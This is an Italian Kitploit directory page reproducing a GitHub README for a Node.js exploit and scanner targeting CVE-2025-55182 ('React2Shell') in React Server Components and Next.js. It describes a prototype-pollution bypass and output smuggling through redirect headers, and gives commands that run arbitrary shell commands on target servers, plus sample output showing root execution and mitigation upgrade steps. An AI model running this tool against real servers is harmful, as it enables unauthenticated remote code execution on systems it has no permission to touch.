Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
React-Security-CVE-2025-55182-Exploit — Script di exploit e scanner basati su NodeJS per la vulnerabilità "React2Shell" dei React Server Components (CVE-2025-55182). | Kitploit
Strumenti/GitHubGitHub/sangleshubham/react-security-cve-2025-55182-exploit
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubsangleshubham/react-security-cve-2025-55182-exploit

React-Security-CVE-2025-55182-Exploit

Script di exploit e scanner basati su NodeJS per la vulnerabilità "React2Shell" dei React Server Components (CVE-2025-55182).

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
28 mesi faNon ancora revisionato

⚛️ Exploit React2Shell (CVE-2025-55182)

Severity CVSS Node License

Uno scanner Proof of Concept (PoC) automatizzato e leggero per la vulnerabilità critica RCE nei React Server Components (React 19 / Next.js).

⚠️ Disclaimer Legale

SOLO A SCOPO DIDATTICO E DI RICERCA SULLA SICUREZZA.

Questo strumento è progettato per aiutare professionisti della sicurezza e amministratori a verificare la vulnerabilità dei propri sistemi. L'autore non è responsabile per qualsiasi uso improprio, danno o atto illegale compiuto utilizzando questo codice.

  • Non scansionare target senza autorizzazione esplicita.
  • Questo strumento esegue codice sul server di destinazione. Usalo responsabilmente.

🔍 Cos'è CVE-2025-55182?

CVE-2025-55182 è una vulnerabilità di esecuzione remota di codice in react-server-dom-webpack, un pacchetto centrale utilizzato da Next.js (App Router) e React 19.

La vulnerabilità consente a un utente malintenzionato non autenticato di iniettare payload malevoli nelle React Server Actions. Manipolando il processo di deserializzazione, l'attaccante può accedere al costruttore Function di JavaScript ed eseguire comandi arbitrari sul server.

Leggi in dettaglio: https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components

Versioni Affette:

  • react-server-dom-webpack: 19.0.0 - 19.2.0
  • next: 13.4.x, 14.x (pre-14.2.35), 15.x (pre-15.5.9)

🚀 Nuove Funzionalità (v2.0)

Questo script aggiornato utilizza tecniche di sfruttamento avanzate per essere più affidabile:

  1. Bypass Universale: Utilizza Prototype Pollution sui dati interni del modulo per bypassare la necessità di un ID Next-Action valido. Funziona su qualsiasi istanza Next.js vulnerabile senza ricognizione manuale.
  2. Redirect Smuggling: Forza il server a generare un falso "Redirect Error", contrabbandando l'output del comando nell'header HTTP Location. Evita errori 500 e fornisce output pulito.
  3. Scansione in blocco: Controlla più domini con un unico comando.

🚀 Configurazione e Installazione

  1. Clona il repository:

    root@kitploit:~
    git clone https://github.com/sangleshubham/React-Security-CVE-2025-55182-Exploit.git
    
  2. Vai nella directory:

    root@kitploit:~
    cd React-Security-CVE-2025-55182-Exploit
    
  3. Controlla la versione di Node.js: Assicurati di avere Node.js installato (si consiglia v18 o superiore).

    root@kitploit:~
    node -v
    

    (Nota: Questo script utilizza librerie standard di Node.js, quindi non è richiesto npm install.)


⚡ Come Eseguire lo Script

Lo script react2shell.js rileva automaticamente se stai scansionando uno o più target.

Opzione 1: Scansione Singola o Multipla

Il comando predefinito eseguito è id.

root@kitploit:~
# Singolo Target
node react2shell.js http://localhost:3000 ls

# Target Multipli
node react2shell.js http://localhost:3000 [http://staging.example.com] ls

Opzione 2: Comando Personalizzato

Per eseguire un comando specifico, fornisci come ultimo argomento.

root@kitploit:~
# Sintassi: node script.js <URL> <COMANDO>
node react2shell.js http://localhost:3000 <comando>

📊 Interpretazione dell'Output

  • ⚠️ VULNERABILE: Lo strumento ha eseguito con successo il comando e contrabbandato l'output tramite l'header di redirect.

    root@kitploit:~
    [*] Avvio scansione universale...
    [*] Payload Comando: "id"
    
    ⚠️  VULNERABILE (http://localhost:3000)
        Output: uid=0(root) gid=0(root) groups=0(root)
    
  • 🛡️ SICURO: Il server ha rifiutato il payload o è stato patchato.

    root@kitploit:~
    🛡️  SICURO (http://google.com) | Stato: 405
    
  • ❌ ERRORE DI CONNESSIONE: Lo script non ha potuto raggiungere il server.

    root@kitploit:~
    ❌ ERRORE DI CONNESSIONE (http://bad-url.com) | fetch fallito
    

🛡️ Mitigazione

Se la tua applicazione è vulnerabile, aggiorna le dipendenze immediatamente.

Per Next.js:

root@kitploit:~
# Next.js 14
npm install [email protected] react@latest react-dom@latest

# Next.js 15
npm install [email protected] react@latest react-dom@latest

Per altri framework (Waku, Remix, ecc.): Assicurati che react-server-dom-webpack sia aggiornato alla v19.2.1 o superiore.


📜 Licenza

Distribuito sotto licenza MIT. Vedi LICENSE per maggiori informazioni.

Scarica lo strumento